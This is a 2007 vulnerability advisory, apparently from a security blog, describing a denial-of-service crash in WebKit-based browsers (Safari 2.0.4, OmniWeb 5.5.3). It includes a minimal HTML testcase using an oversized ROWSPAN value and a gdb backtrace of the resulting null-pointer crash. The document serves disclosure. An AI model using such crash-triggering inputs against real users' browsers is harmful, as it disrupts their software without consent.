Apple OS X WebKit WebCore::ArrayImpl "ROWSPAN" DoS

Release Date:
January 14th, 2007

Severity:
Low

Vendor:
Apple

Versions Affected:
Apple OS X 10.4.8
Safari 2.0.4 (419.3)
WebKit build 18794
OmniWeb 5.5.3

Overview:
A denial of service (null pointer) vulnerability exists within WebKit which allows for an attacker to post a specially crafted .html page causing the application to crash. This is basiclly a follow up to another flaw which was reported by Yannick von Arx, that was fixed in the latest build of WebKit but was not fixed in Safari.

Technical Details:
Below is a testcase to reproduce this issue:

TABLE
TD ROWSPAN=40000001

Below is the crash triggered on OSX 10.4.8 agaisnt OmniWeb 5.5.3:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
(gdb) bt
#0 0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
#1 0x34636a28 in WebCore::RenderTableSection::ensureRows ()
#2 0x34637417 in WebCore::RenderTableSection::addCell ()
#3 0x34638b20 in WebCore::RenderTableRow::addChild ()
#4 0x3456042b in WebCore::NodeImpl::createRendererIfNeeded ()
#5 0x3448a1a0 in WebCore::ElementImpl::attach ()
#6 0x3447ec73 in WebCore::HTMLParser::insertNode ()
#7 0x3447f210 in WebCore::HTMLParser::handleError ()
#8 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#9 0x3447f210 in WebCore::HTMLParser::handleError ()
#10 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#11 0x34481402 in WebCore::HTMLParser::parseToken ()
#12 0x34482732 in WebCore::HTMLTokenizer::processToken ()
#13 0x344867de in WebCore::HTMLTokenizer::parseTag ()
#14 0x344884fb in WebCore::HTMLTokenizer::write ()
#15 0x34533ae0 in WebCore::Frame::write ()
== snip ==

Solution:
Get Firefox!

Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com

Related Links:
http://security-protocols.com/poc/sp-x41.html
http://security-protocols.com/sp-x41-advisory.php
http://nightly.webkit.org
http://developer.apple.com/opensource/internet/webkit.html
http://omnigroup.com/applications/omniweb/

2007 Security-Protocols LLC

• Search

  
  
  

• Categories

  • Advisories
  • Affiliate Marketing
  • Apple
  • Books
  • Encryption
  • Flaws
  • Fuzzers
  • Gadgets
  • Humor
  • iPhone
  • Link Development
  • Microsoft
  • Misc
  • News
  • Off Topic
  • Photos
  • Reversing
  • Search Engines
  • Search Marketing
  • Security
  • SEO
  • Speedlinking
  • Tools
• 
  
  

  Archives

  • June 2008
  • May 2008
  • April 2008
  • March 2008
  • January 2008
  • December 2007
  • November 2007
  • October 2007
  • September 2007
  • August 2007
  • July 2007
  • June 2007
  • May 2007
  • April 2007
  • March 2007
  • February 2007
  • January 2007
  • December 2006
  • November 2006

• Meta

  • Log in
  • RSS 2.0
  
  
• 
  

  Blogroll

  
  Ladera Ranch Photography
  Invenio Security
  
  
  

Security-Protocols, LLC 2000 - 2008